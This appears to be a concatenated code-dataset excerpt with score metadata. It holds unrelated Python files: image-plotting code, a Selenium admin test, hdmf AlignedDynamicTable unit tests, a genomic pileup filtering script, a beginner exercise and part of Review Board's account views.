cv2.imwrite(path_out_img, self.roi_img)
def show_result(self):
#####
plt.figure()
plt.subplot(241)
plt.imshow(self.in_img_g, cmap="gray")
plt.title("original")
plt.subplot(242)
plt.imshow(self.thresh_img, cmap="gray")
plt.title("threshold")
plt.subplot(243)
plt.imshow(self.contour_img, cmap="gray")
plt.plot(self.center_point["x"], self.center_point["y"], 'bx')
plt.title("contours")
plt.subplot(244)
plt.imshow(self.in_img_c, cmap="gray")
for idx in range(len(self.landmarks["x"])):
plt.plot(self.landmarks["x"][idx], self.landmarks["y"][idx], 'rx')
plt.title("landmarks")
plt.subplot(245)
plt.imshow(self.in_img_c, cmap="gray")
plt.plot(self.landmarks_selected["x"][0],
self.landmarks_selected["y"][0], 'rx')
plt.plot(self.landmarks_selected["x"][1],
self.landmarks_selected["y"][1], 'rx')
plt.title("selected")
plt.subplot(246)
plt.imshow(self.align_img, cmap="gray")
plt.plot(self.landmarks_selected_align["x"][0],
self.landmarks_selected_align["y"][0], 'rx')
plt.plot(self.landmarks_selected_align["x"][1],
self.landmarks_selected_align["y"][1], 'rx')
plt.title("alignement")
plt.subplot(247)
plt.imshow(self.roi_zone_img, cmap="gray")
plt.title("roi zone")
plt.subplot(248)
plt.imshow(self.roi_img, cmap="gray")
plt.title("extraction")
plt.show() | 2.9375 | 3 |
hth/news/tests/test_admin.py | roperi/myband | 1 | 12770002 | from hth.core.tests.selenium import AdminTestCase
class NewsTestCase(AdminTestCase):
def test_can_create_post(self):
# Ryan logs into the admin
self.adminLogin()
# He adds a draft Post
self.find_link('Posts').click()
self.find_link('ADD POST').click()
self.find_name('title').send_keys('First post')
self.find_name('body').send_keys('<PASSWORD>')
self.find_name('_save').click()
self.assertIn('First post', self.find_tag('body').text)
# He makes sure that it's not published
self.get_url('/news')
self.assertIn('News', self.browser.title)
self.assertNotIn('First post', self.find_tag('body').text)
self.get_url('/news/first-post')
self.assertNotIn('First post', self.browser.title)
# He publishes the post
self.get_url('/admin')
self.find_link('Posts').click()
self.find_link('First post').click()
self.find_name('publish').click()
self.find_name('_save').click()
# He verifies that it was published
self.get_url('/news')
self.find_link('First post').click()
self.assertIn('First post', self.browser.title)
# TODO: He checks the order of the posts?
| 2.453125 | 2 |
hentaihavendev/__init__.py | unsecuring/hentaihavendev | 0 | 12770003 | from hentaihavendev import fact
from hentaihavendev import nsfw | 0.949219 | 1 |
Course 01 - Getting Started with Python/Extra Studies/Functions/ex010.py | marcoshsq/python_practical_exercises | 9 | 12770004 | <filename>Course 01 - Getting Started with Python/Extra Studies/Functions/ex010.py
# Exercise 105 - Parsing and Generating Dictionaries
'''Write a program that has a grades() function that can receive multiple grades
from students and will return a dictionary with the following information:
- Number of notes
- The highest grade
- The lowest grade
- The class average
- The situation (optional)
Also add the docstrings of this function for query by the developer.'''
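

# A possible sketch of the requested function (my reading of the spec above;
# the thresholds behind the optional "situation" key are assumptions):
def grades(*nums, situation=False):
    """Receive any number of grades and return a summary dictionary.

    Keys: 'total' (how many grades), 'highest', 'lowest', 'average',
    plus 'situation' when situation=True.
    """
    result = {
        'total': len(nums),
        'highest': max(nums),
        'lowest': min(nums),
        'average': sum(nums) / len(nums),
    }
    if situation:
        if result['average'] >= 7:
            result['situation'] = 'GOOD'
        elif result['average'] >= 5:
            result['situation'] = 'FAIR'
        else:
            result['situation'] = 'POOR'
    return result


# Example call: grades(5.5, 9.5, 10, 6.5, situation=True)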
| 4.125 | 4 |
tests/unit/common/test_alignedtable.py | hrnciar/hdmf | 0 | 12770005 | import numpy as np
from pandas.testing import assert_frame_equal
import warnings
from hdmf.backends.hdf5 import HDF5IO
from hdmf.common import DynamicTable, VectorData, get_manager, AlignedDynamicTable
from hdmf.testing import TestCase, remove_test_file
class TestAlignedDynamicTableContainer(TestCase):
"""
Test the AlignedDynamicTable Container class.
"""
def setUp(self):
warnings.simplefilter("always") # Trigger all warnings
self.path = 'test_icephys_meta_intracellularrecording.h5'
def tearDown(self):
remove_test_file(self.path)
def test_init(self):
"""Test that just checks that populating the tables with data works correctly"""
AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container')
def test_init_categories_without_category_tables_error(self):
        # Test that an error is raised if categories are given without category_tables
with self.assertRaisesWith(ValueError, "Categories provided but no category_tables given"):
AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
categories=['cat1', 'cat2'])
def test_init_length_mismatch_between_categories_and_category_tables(self):
# Test length mismatch between categories and category_tables
with self.assertRaisesWith(ValueError, "0 category_tables given but 2 categories specified"):
AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
categories=['cat1', 'cat2'],
category_tables=[])
def test_init_category_table_names_do_not_match_categories(self):
# Construct some categories for testing
category_names = ['test1', 'test2', 'test3']
num_rows = 10
categories = [DynamicTable(name=val,
description=val+" description",
columns=[VectorData(name=val+t,
description=val+t+' description',
data=np.arange(num_rows)) for t in ['c1', 'c2', 'c3']]
) for val in category_names]
# Test add category_table that is not listed in the categories list
with self.assertRaisesWith(ValueError,
"DynamicTable test3 does not appear in categories ['test1', 'test2', 't3']"):
AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
categories=['test1', 'test2', 't3'], # bad name for 'test3'
category_tables=categories)
def test_init_duplicate_category_table_name(self):
# Test duplicate table name
with self.assertRaisesWith(ValueError, "Duplicate table name test1 found in input dynamic_tables"):
categories = [DynamicTable(name=val,
description=val+" description",
columns=[VectorData(name=val+t,
description=val+t+' description',
data=np.arange(10)) for t in ['c1', 'c2', 'c3']]
) for val in ['test1', 'test1', 'test3']]
AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
categories=['test1', 'test2', 'test3'],
category_tables=categories)
def test_init_misaligned_category_tables(self):
"""Test misaligned category tables"""
categories = [DynamicTable(name=val,
description=val+" description",
columns=[VectorData(name=val+t,
description=val+t+' description',
data=np.arange(10)) for t in ['c1', 'c2', 'c3']]
) for val in ['test1', 'test2']]
categories.append(DynamicTable(name='test3',
description="test3 description",
columns=[VectorData(name='test3 '+t,
description='test3 '+t+' description',
data=np.arange(8)) for t in ['c1', 'c2', 'c3']]))
with self.assertRaisesWith(ValueError,
"Category DynamicTable test3 does not align, it has 8 rows expected 10"):
AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
categories=['test1', 'test2', 'test3'],
category_tables=categories)
def test_init_with_custom_empty_categories(self):
"""Test that we can create an empty table with custom categories"""
category_names = ['test1', 'test2', 'test3']
categories = [DynamicTable(name=val, description=val+" description") for val in category_names]
AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
category_tables=categories)
    def test_init_with_custom_nonempty_categories(self):
        """Test that we can create a table with custom non-empty categories"""
category_names = ['test1', 'test2', 'test3']
num_rows = 10
categories = [DynamicTable(name=val,
description=val+" description",
columns=[VectorData(name=val+t,
description=val+t+' description',
data=np.arange(num_rows)) for t in ['c1', 'c2', 'c3']]
) for val in category_names]
temp = AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
category_tables=categories)
self.assertEqual(temp.categories, category_names)
def test_init_with_custom_nonempty_categories_and_main(self):
"""
Test that we can create a non-empty table with custom non-empty categories
"""
category_names = ['test1', 'test2', 'test3']
num_rows = 10
categories = [DynamicTable(name=val,
description=val+" description",
columns=[VectorData(name=t,
description=val+t+' description',
data=np.arange(num_rows)) for t in ['c1', 'c2', 'c3']]
) for val in category_names]
temp = AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
category_tables=categories,
columns=[VectorData(name='main_' + t,
description='main_'+t+'_description',
data=np.arange(num_rows)) for t in ['c1', 'c2', 'c3']])
self.assertEqual(temp.categories, category_names)
self.assertTrue('test1' in temp) # test that contains category works
self.assertTrue(('test1', 'c1') in temp) # test that contains a column works
# test the error case of a tuple with len !=2
with self.assertRaisesWith(ValueError, "Expected tuple of strings of length 2 got tuple of length 3"):
('test1', 'c1', 't3') in temp
self.assertTupleEqual(temp.colnames, ('main_c1', 'main_c2', 'main_c3')) # confirm column names
    def test_init_with_custom_misaligned_categories(self):
        """Test that misaligned custom categories are rejected"""
num_rows = 10
val1 = 'test1'
val2 = 'test2'
categories = [DynamicTable(name=val1,
description=val1+" description",
columns=[VectorData(name=val1+t,
description=val1+t+' description',
data=np.arange(num_rows)) for t in ['c1', 'c2', 'c3']]),
DynamicTable(name=val2,
description=val2+" description",
columns=[VectorData(name=val2+t,
description=val2+t+' description',
data=np.arange(num_rows+1)) for t in ['c1', 'c2', 'c3']])
]
with self.assertRaisesWith(ValueError,
"Category DynamicTable test2 does not align, it has 11 rows expected 10"):
AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
category_tables=categories)
    def test_init_with_duplicate_custom_categories(self):
        """Test that duplicate custom category names are rejected"""
category_names = ['test1', 'test1']
num_rows = 10
categories = [DynamicTable(name=val,
description=val+" description",
columns=[VectorData(name=val+t,
description=val+t+' description',
data=np.arange(num_rows)) for t in ['c1', 'c2', 'c3']]
) for val in category_names]
with self.assertRaisesWith(ValueError, "Duplicate table name test1 found in input dynamic_tables"):
AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
category_tables=categories)
def test_init_with_bad_custom_categories(self):
"""Test that we cannot provide a category that is not a DynamicTable"""
num_rows = 10
categories = [ # good category
DynamicTable(name='test1',
description="test1 description",
columns=[VectorData(name='test1'+t,
description='test1' + t + ' description',
data=np.arange(num_rows)) for t in ['c1', 'c2', 'c3']]
),
# use a list as a bad category example
[0, 1, 2]]
with self.assertRaisesWith(ValueError, "Category table with index 1 is not a DynamicTable"):
AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
category_tables=categories)
def test_round_trip_container(self):
"""Test read and write the container by itself"""
category_names = ['test1', 'test2', 'test3']
num_rows = 10
categories = [DynamicTable(name=val,
description=val+" description",
columns=[VectorData(name=t,
description=val+t+' description',
data=np.arange(num_rows)) for t in ['c1', 'c2', 'c3']]
) for val in category_names]
curr = AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
category_tables=categories)
with HDF5IO(self.path, manager=get_manager(), mode='w') as io:
io.write(curr)
with HDF5IO(self.path, manager=get_manager(), mode='r') as io:
incon = io.read()
self.assertListEqual(incon.categories, curr.categories)
for n in category_names:
assert_frame_equal(incon[n], curr[n])
    def test_add_category(self):
        """Test that we can add a non-empty category to an existing table"""
category_names = ['test1', 'test2', 'test3']
num_rows = 10
categories = [DynamicTable(name=val,
description=val+" description",
columns=[VectorData(name=val+t,
description=val+t+' description',
data=np.arange(num_rows)) for t in ['c1', 'c2', 'c3']]
) for val in category_names]
adt = AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
category_tables=categories[0:2])
self.assertListEqual(adt.categories, category_names[0:2])
adt.add_category(categories[-1])
self.assertListEqual(adt.categories, category_names)
    def test_add_category_misaligned_rows(self):
        """Test that adding a category with a mismatched row count raises an error"""
category_names = ['test1', 'test2']
num_rows = 10
categories = [DynamicTable(name=val,
description=val+" description",
columns=[VectorData(name=val+t,
description=val+t+' description',
data=np.arange(num_rows)) for t in ['c1', 'c2', 'c3']]
) for val in category_names]
adt = AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
category_tables=categories)
self.assertListEqual(adt.categories, category_names)
with self.assertRaisesWith(ValueError, "New category DynamicTable does not align, it has 8 rows expected 10"):
adt.add_category(DynamicTable(name='test3',
description='test3_description',
columns=[VectorData(name='test3_'+t,
description='test3 '+t+' description',
data=np.arange(num_rows - 2)) for t in ['c1', 'c2', 'c3']
]))
def test_add_category_already_in_table(self):
category_names = ['test1', 'test2', 'test2']
num_rows = 10
categories = [DynamicTable(name=val,
description=val+" description",
columns=[VectorData(name=val+t,
description=val+t+' description',
data=np.arange(num_rows)) for t in ['c1', 'c2', 'c3']]
) for val in category_names]
adt = AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
category_tables=categories[0:2])
self.assertListEqual(adt.categories, category_names[0:2])
with self.assertRaisesWith(ValueError, "Category test2 already in the table"):
adt.add_category(categories[-1])
def test_add_column(self):
adt = AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
columns=[VectorData(name='test_'+t,
description='test_'+t+' description',
data=np.arange(10)) for t in ['c1', 'c2', 'c3']])
# Test successful add
adt.add_column(name='testA', description='testA', data=np.arange(10))
self.assertTupleEqual(adt.colnames, ('test_c1', 'test_c2', 'test_c3', 'testA'))
def test_add_column_bad_category(self):
"""Test add column with bad category"""
adt = AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
columns=[VectorData(name='test_'+t,
description='test_'+t+' description',
data=np.arange(10)) for t in ['c1', 'c2', 'c3']])
with self.assertRaisesWith(KeyError, "'Category mycat not in table'"):
adt.add_column(category='mycat', name='testA', description='testA', data=np.arange(10))
def test_add_column_bad_length(self):
"""Test add column that is too short"""
adt = AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
columns=[VectorData(name='test_'+t,
description='test_'+t+' description',
data=np.arange(10)) for t in ['c1', 'c2', 'c3']])
# Test successful add
with self.assertRaisesWith(ValueError, "column must have the same number of rows as 'id'"):
adt.add_column(name='testA', description='testA', data=np.arange(8))
def test_add_column_to_subcategory(self):
"""Test adding a column to a subcategory"""
category_names = ['test1', 'test2', 'test3']
num_rows = 10
categories = [DynamicTable(name=val,
description=val+" description",
columns=[VectorData(name=val+t,
description=val+t+' description',
data=np.arange(num_rows)) for t in ['c1', 'c2', 'c3']]
) for val in category_names]
adt = AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
category_tables=categories)
self.assertListEqual(adt.categories, category_names)
# Test successful add
adt.add_column(category='test2', name='testA', description='testA', data=np.arange(10))
self.assertTupleEqual(adt.get_category('test2').colnames, ('test2c1', 'test2c2', 'test2c3', 'testA'))
def test_add_row(self):
"""Test adding a row to a non_empty table"""
category_names = ['test1', ]
num_rows = 10
categories = [DynamicTable(name=val,
description=val+" description",
columns=[VectorData(name=t,
description=val+t+' description',
data=np.arange(num_rows)) for t in ['c1', 'c2']]
) for val in category_names]
temp = AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
category_tables=categories,
columns=[VectorData(name='main_' + t,
description='main_'+t+'_description',
data=np.arange(num_rows)) for t in ['c1', 'c2']])
self.assertListEqual(temp.categories, category_names)
# Test successful add
temp.add_row(test1=dict(c1=1, c2=2), main_c1=3, main_c2=5)
self.assertListEqual(temp[10].iloc[0].tolist(), [3, 5, 10, 1, 2])
# Test successful add version 2
temp.add_row(data=dict(test1=dict(c1=1, c2=2), main_c1=4, main_c2=5))
self.assertListEqual(temp[11].iloc[0].tolist(), [4, 5, 11, 1, 2])
# Test missing categories data
with self.assertRaises(KeyError) as ke:
temp.add_row(main_c1=3, main_c2=5)
self.assertTrue("row data keys do not match" in str(ke.exception))
def test_get_item(self):
"""Test getting elements from the table"""
category_names = ['test1', ]
num_rows = 10
categories = [DynamicTable(name=val,
description=val+" description",
columns=[VectorData(name=t,
description=val+t+' description',
data=np.arange(num_rows) + i + 3)
for i, t in enumerate(['c1', 'c2'])]
) for val in category_names]
temp = AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
category_tables=categories,
columns=[VectorData(name='main_' + t,
description='main_'+t+'_description',
data=np.arange(num_rows)+2) for t in ['c1', 'c2']])
self.assertListEqual(temp.categories, category_names)
# Test slicing with a single index
self.assertListEqual(temp[5].iloc[0].tolist(), [7, 7, 5, 8, 9])
# Test slice with list
self.assertListEqual(temp[[5, 7]].iloc[0].tolist(), [7, 7, 5, 8, 9])
self.assertListEqual(temp[[5, 7]].iloc[1].tolist(), [9, 9, 7, 10, 11])
# Test slice with slice
self.assertListEqual(temp[5:7].iloc[0].tolist(), [7, 7, 5, 8, 9])
self.assertListEqual(temp[5:7].iloc[1].tolist(), [8, 8, 6, 9, 10])
        # Test slice with numpy index array
self.assertListEqual(temp[np.asarray([5, 8])].iloc[0].tolist(), [7, 7, 5, 8, 9])
self.assertListEqual(temp[np.asarray([5, 8])].iloc[1].tolist(), [10, 10, 8, 11, 12])
# Test slicing for a single column
self.assertListEqual(temp['main_c1'][:].tolist(), (np.arange(num_rows)+2).tolist())
# Test slicing for a single category
assert_frame_equal(temp['test1'], categories[0].to_dataframe())
# Test getting the main table
assert_frame_equal(temp[None], temp.to_dataframe())
# Test getting a specific column
self.assertListEqual(temp['test1', 'c1'][:].tolist(), (np.arange(num_rows) + 3).tolist())
# Test getting a specific cell
self.assertEqual(temp[None, 'main_c1', 1], 3)
# Test bad selection tuple
with self.assertRaisesWith(ValueError,
"Expected tuple of length 2 or 3 with (category, column, row) as value."):
temp[('main_c1',)]
def test_to_dataframe(self):
"""Test that the to_dataframe method works"""
category_names = ['test1', 'test2', 'test3']
num_rows = 10
categories = [DynamicTable(name=val,
description=val+" description",
columns=[VectorData(name=t,
description=val+t+' description',
data=np.arange(num_rows)) for t in ['c1', 'c2', 'c3']]
) for val in category_names]
adt = AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
category_tables=categories,
columns=[VectorData(name='main_' + t,
description='main_'+t+'_description',
data=np.arange(num_rows)) for t in ['c1', 'c2', 'c3']])
# Test the to_dataframe method with default settings
tdf = adt.to_dataframe()
self.assertListEqual(tdf.index.tolist(), list(range(10)))
self.assertTupleEqual(tdf.index.name, ('test_aligned_table', 'id'))
expected_cols = [('test_aligned_table', 'main_c1'),
('test_aligned_table', 'main_c2'),
('test_aligned_table', 'main_c3'),
('test1', 'id'), ('test1', 'c1'), ('test1', 'c2'), ('test1', 'c3'),
('test2', 'id'), ('test2', 'c1'), ('test2', 'c2'), ('test2', 'c3'),
('test3', 'id'), ('test3', 'c1'), ('test3', 'c2'), ('test3', 'c3')]
tdf_cols = tdf.columns.tolist()
for v in zip(expected_cols, tdf_cols):
self.assertTupleEqual(v[0], v[1])
# test the to_dataframe method with ignore_category_ids set to True
tdf = adt.to_dataframe(ignore_category_ids=True)
self.assertListEqual(tdf.index.tolist(), list(range(10)))
self.assertTupleEqual(tdf.index.name, ('test_aligned_table', 'id'))
expected_cols = [('test_aligned_table', 'main_c1'),
('test_aligned_table', 'main_c2'),
('test_aligned_table', 'main_c3'),
('test1', 'c1'), ('test1', 'c2'), ('test1', 'c3'),
('test2', 'c1'), ('test2', 'c2'), ('test2', 'c3'),
('test3', 'c1'), ('test3', 'c2'), ('test3', 'c3')]
tdf_cols = tdf.columns.tolist()
for v in zip(expected_cols, tdf_cols):
self.assertTupleEqual(v[0], v[1])
def test_nested_aligned_dynamic_table_not_allowed(self):
"""
        Test that using an AlignedDynamicTable as a category for an AlignedDynamicTable is not allowed
"""
# create an AlignedDynamicTable as category
subsubcol1 = VectorData(name='sub_sub_column1', description='test sub sub column', data=['test11', 'test12'])
sub_category = DynamicTable(name='sub_category1', description='test subcategory table', columns=[subsubcol1, ])
subcol1 = VectorData(name='sub_column1', description='test-subcolumn', data=['test1', 'test2'])
adt_category = AlignedDynamicTable(
name='category1',
description='test using AlignedDynamicTable as a category',
columns=[subcol1, ],
category_tables=[sub_category, ])
# Create a regular column for our main AlignedDynamicTable
col1 = VectorData(name='column1', description='regular test column', data=['test1', 'test2'])
# test 1: Make sure we can't add the AlignedDynamicTable category on init
msg = ("Category table with index %i is an AlignedDynamicTable. "
"Nesting of AlignedDynamicTable is currently not supported." % 0)
with self.assertRaisesWith(ValueError, msg):
# create the nested AlignedDynamicTable with our adt_category as a sub-category
AlignedDynamicTable(
name='nested_adt',
description='test nesting AlignedDynamicTable',
columns=[col1, ],
category_tables=[adt_category, ])
# test 2: Make sure we can't add the AlignedDynamicTable category via add_category
adt = AlignedDynamicTable(
name='nested_adt',
description='test nesting AlignedDynamicTable',
columns=[col1, ])
msg = "Category is an AlignedDynamicTable. Nesting of AlignedDynamicTable is currently not supported."
with self.assertRaisesWith(ValueError, msg):
adt.add_category(adt_category)
| 2.515625 | 3 |
Filtering/filter_pileup_for_unique_sites.py | Lammlab/Resic | 3 | 12770006 | <gh_stars>1-10
##############################################################################################################################
# Author: <NAME>
# Main goal: Takes several pileup files and for each one writes to a new file only the unique sites (that is, only sites
#            that do not appear in any of the other pileup files).
##############################################################################################################################
from docopt import docopt
import sys
import shutil
import Utility.generators_utilities as gen_util
from Utility.Pileup_class import Pileup_line
from Utility.parallel_generator import parallel_generator
from Processing.pileup_sorting import pileup_sort
from Utility.multiline_sort import multiline_sort_pileup
def get_candidate_nucl(pileup_line):
    # strip read start/end markers; note that '^' is followed by a mapping-quality
    # character, which is left in place as in the original logic
    clean_str = ''.join(char for char in pileup_line.reads_string
                        if char not in ('^', '$'))
    # normalize reverse-strand matches so both strands are treated alike
    sense_string = clean_str.replace(',', '.')
    # Find the candidate nucleotide reads; count both upper- and lower-case letters
    nucl_changes = {"A": 0, "C": 0, "G": 0, "T": 0, "a": 0, "c": 0, "g": 0, "t": 0}
    for nucl in sense_string:
        if nucl in nucl_changes:
            nucl_changes[nucl] += 1
    # get the maximal nucleotide change, key is the value of the dict
    (candidate_nucl, candidate_nucl_reads) = max(nucl_changes.items(), key=lambda x: x[1])
    return candidate_nucl
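# Illustrative sketch (added, not part of the original pipeline): a
# minimal stand-in object shows how the candidate call behaves for a
# hypothetical pileup read string.
def _candidate_nucl_example():
    class _FakeLine(object):
        reads_string = '^F.,,GgG$'  # hypothetical reads column
    # cleaned to 'F...GgG'; counts G=2, g=1 -> candidate is 'G'
    return get_candidate_nucl(_FakeLine())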
def write_unique_sites_doing_nothing(positive_pileup_list, sorted_input=True):
"""
    :param positive_pileup_list: list of positive pileup files to be filtered
    :param sorted_input: binary flag, set to False if input pileups are not sorted
    :return: list of output pileup file names
"""
# sorting pileups if necessary and preparing filenames
sorted_positive_pileups = []
if not sorted_input:
for pileup in positive_pileup_list:
multiline_sort_pileup(1, '~~~', 1, pileup, 2, pileup + "_sorted.pileup")
sorted_positive_pileups.append(pileup + "_sorted.pileup")
else:
sorted_positive_pileups = positive_pileup_list
#create output files for each pileup
output_positive_pileups = []
for pile in sorted_positive_pileups:
splited = pile.split(".")
shutil.copyfile(pile, ".".join(splited[:-1]) + "_unique." + splited[-1])
output_positive_pileups.append(".".join(splited[:-1]) + "_unique." + splited[-1])
return output_positive_pileups
def write_unique_sites(positive_pileup_list, sorted_input=True):
"""
    :param positive_pileup_list: list of positive pileup files to be filtered
    :param sorted_input: binary flag, set to False if input pileups are not sorted
    :return: list of output pileup file names
"""
# sorting pileups if necessary and preparing filenames
sorted_positive_pileups = []
if not sorted_input:
for pileup in positive_pileup_list:
multiline_sort_pileup(1, '~~~', 1, pileup, 2, pileup + "_sorted.pileup")
sorted_positive_pileups.append(pileup + "_sorted.pileup")
else:
sorted_positive_pileups = positive_pileup_list
#create output files for each pileup
output_positive_pileups = []
for pile in sorted_positive_pileups:
splited = pile.split(".")
output_positive_pileups.append(".".join(splited[:-1]) + "_unique." + splited[-1])
# parameters for parallel generator
pos_obj_list = [open(pile) for pile in sorted_positive_pileups]
out_obj_list = [open(out,'w') for out in output_positive_pileups]
pos_gen_list = []
get_pos_and_id = lambda x: (x.reference_id, x.gene_pos)
# logic of the function
try:
for file_obj in pos_obj_list:
pos_gen_list.append(gen_util.class_generator(Pileup_line, file=file_obj))
        parallel_gen = parallel_generator(pos_gen_list,
                                          [get_pos_and_id] * len(pos_gen_list))
        for listlist in parallel_gen:  # each entry in listlist is a list of items from one generator (or None)
            true_index_list = [index for index, value in enumerate(listlist) if value]
            # a site is unique if it appears in exactly one of the input pileups
            if len(true_index_list) == 1:
                out_obj_list[true_index_list[0]].write(str(listlist[true_index_list[0]][0]) + "\n")
            # In hyper mode a single site can be mapped twice (e.g. A-G in the A_G file and
            # A-g in the C_T file); this happens for non-stranded data. In these cases we
            # keep the site only once.
            if len(true_index_list) == 2:
if get_candidate_nucl(listlist[true_index_list[0]][0]).upper() == get_candidate_nucl(listlist[true_index_list[1]][0]).upper():
out_obj_list[true_index_list[1]].write(str(listlist[true_index_list[1]][0]) + "\n")
if len(true_index_list) == 3:
if get_candidate_nucl(listlist[true_index_list[0]][0]).upper() == get_candidate_nucl(listlist[true_index_list[1]][0]).upper() and \
get_candidate_nucl(listlist[true_index_list[2]][0]).upper() == get_candidate_nucl(listlist[true_index_list[0]][0]).upper():
out_obj_list[true_index_list[1]].write(str(listlist[true_index_list[1]][0]) + "\n")
except Exception as e:
print(e)
for out_file in out_obj_list:
out_file.close()
for file in pos_obj_list:
file.close()
return output_positive_pileups
if __name__ == '__main__':
pass
| 2.5 | 2 |
reviewboard/accounts/views.py | amalik2/reviewboard | 921 | 12770007 | from __future__ import unicode_literals
import logging
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.forms.forms import ErrorDict
from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404
from django.utils import six
from django.utils.decorators import method_decorator
from django.utils.functional import cached_property
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _
from django.views.decorators.csrf import csrf_protect
from django.views.generic.base import TemplateView
from djblets.auth.views import register
from djblets.configforms.views import ConfigPagesView
from djblets.features.decorators import feature_required
from djblets.forms.fieldsets import filter_fieldsets
from djblets.siteconfig.models import SiteConfiguration
from djblets.util.compat.django.shortcuts import render
from djblets.util.decorators import augment_method_from
from djblets.views.generic.etag import ETagViewMixin
from reviewboard.accounts.backends import get_enabled_auth_backends
from reviewboard.accounts.forms.registration import RegistrationForm
from reviewboard.accounts.mixins import CheckLoginRequiredViewMixin
from reviewboard.accounts.models import Profile
from reviewboard.accounts.pages import AccountPage, OAuth2Page, PrivacyPage
from reviewboard.accounts.privacy import is_consent_missing
from reviewboard.admin.decorators import check_read_only
from reviewboard.avatars import avatar_services
from reviewboard.notifications.email.decorators import preview_email
from reviewboard.notifications.email.message import \
prepare_password_changed_mail
from reviewboard.oauth.features import oauth2_service_feature
from reviewboard.oauth.forms import (UserApplicationChangeForm,
UserApplicationCreationForm)
from reviewboard.oauth.models import Application
from reviewboard.site.mixins import CheckLocalSiteAccessViewMixin
from reviewboard.site.urlresolvers import local_site_reverse
class UserInfoboxView(CheckLoginRequiredViewMixin,
CheckLocalSiteAccessViewMixin,
ETagViewMixin,
TemplateView):
"""Displays information on a user, for use in user pop-up infoboxes.
This is meant to be embedded in other pages, rather than being
a standalone page.
"""
template_name = 'accounts/user_infobox.html'
def __init__(self, **kwargs):
"""Initialize a view for the request.
Args:
**kwargs (dict):
Keyword arguments passed to :py:meth:`as_view`.
"""
super(UserInfoboxView, self).__init__(**kwargs)
self._lookup_user = None
self._show_profile = None
self._timezone = None
def get_etag_data(self, request, username, *args, **kwargs):
"""Return an ETag for the view.
This will look up some state needed for the request and generate a
suitable ETag.
Args:
request (django.http.HttpRequest):
The HTTP request from the client.
username (unicode):
The username of the user being looked up.
*args (tuple):
Positional arguments to pass to the handler.
**kwargs (tuple):
Keyword arguments to pass to the handler.
These will be arguments provided by the URL pattern.
Returns:
unicode:
The ETag for the page.
"""
from reviewboard.extensions.hooks import UserInfoboxHook
user = get_object_or_404(User, username=username)
self._lookup_user = user
profile = user.get_profile()
self._show_profile = user.is_profile_visible(request.user)
self._timezone = profile.timezone
etag_data = [
user.first_name,
user.last_name,
user.email,
six.text_type(user.last_login),
six.text_type(settings.TEMPLATE_SERIAL),
six.text_type(self._show_profile),
self._timezone,
]
if avatar_services.avatars_enabled:
avatar_service = avatar_services.for_user(user)
if avatar_service:
etag_data.extend(avatar_service.get_etag_data(user))
local_site = self.local_site
for hook in UserInfoboxHook.hooks:
try:
etag_data.append(hook.get_etag_data(
user=user,
request=request,
local_site=local_site))
except Exception as e:
logging.exception('Error when running UserInfoboxHook.'
'get_etag_data method in extension "%s": %s',
hook.extension.id, e)
return ':'.join(etag_data)
def get_context_data(self, **kwargs):
"""Return data for the template.
This will return information on the user, along with information from
any extension hooks used for the page.
Args:
**kwargs (tuple):
Additional keyword arguments from the URL pattern.
Returns:
dict:
Context data for the template.
"""
from reviewboard.extensions.hooks import UserInfoboxHook
# These are accessed several times, so bring them in to reduce
# attribute lookups.
user = self._lookup_user
username = user.username
local_site = self.local_site
extra_content = []
for hook in UserInfoboxHook.hooks:
try:
extra_content.append(hook.render(
user=user,
request=self.request,
local_site=local_site))
except Exception as e:
logging.exception('Error when running UserInfoboxHook.'
'render method in extension "%s": %s',
hook.extension.id, e)
review_requests_url = local_site_reverse('user', local_site=local_site,
args=[username])
reviews_url = local_site_reverse('user-grid', local_site=local_site,
args=[username, 'reviews'])
has_avatar = (
avatar_services.avatars_enabled and
avatar_services.for_user(user) is not None
)
return {
'extra_content': mark_safe(''.join(extra_content)),
'full_name': user.get_full_name(),
'has_avatar': has_avatar,
'infobox_user': user,
'review_requests_url': review_requests_url,
'reviews_url': reviews_url,
'show_profile': self._show_profile,
'timezone': self._timezone,
}
@csrf_protect
def account_register(request, next_url='dashboard'):
"""Display the appropriate registration page.
If registration is enabled and the selected authentication backend supports
creation of users, this will return the appropriate registration page. If
registration is not supported, this will redirect to the login view.
"""
siteconfig = SiteConfiguration.objects.get_current()
auth_backends = get_enabled_auth_backends()
if (auth_backends[0].supports_registration and
siteconfig.get('auth_enable_registration') and
not siteconfig.get('site_read_only')):
response = register(request, next_page=reverse(next_url),
form_class=RegistrationForm)
return response
return HttpResponseRedirect(reverse("login"))
class MyAccountView(ConfigPagesView):
"""Displays the My Account page containing user preferences.
The page will be built based on registered pages and forms. This makes
it easy to plug in new bits of UI for the page, which is handy for
extensions that want to offer customization for users.
"""
title = _('My Account')
css_bundle_names = [
'account-page',
]
js_bundle_names = [
'3rdparty-jsonlint',
'config-forms',
'account-page',
]
@method_decorator(login_required)
@method_decorator(check_read_only)
@augment_method_from(ConfigPagesView)
def dispatch(self, *args, **kwargs):
"""Handle the view.
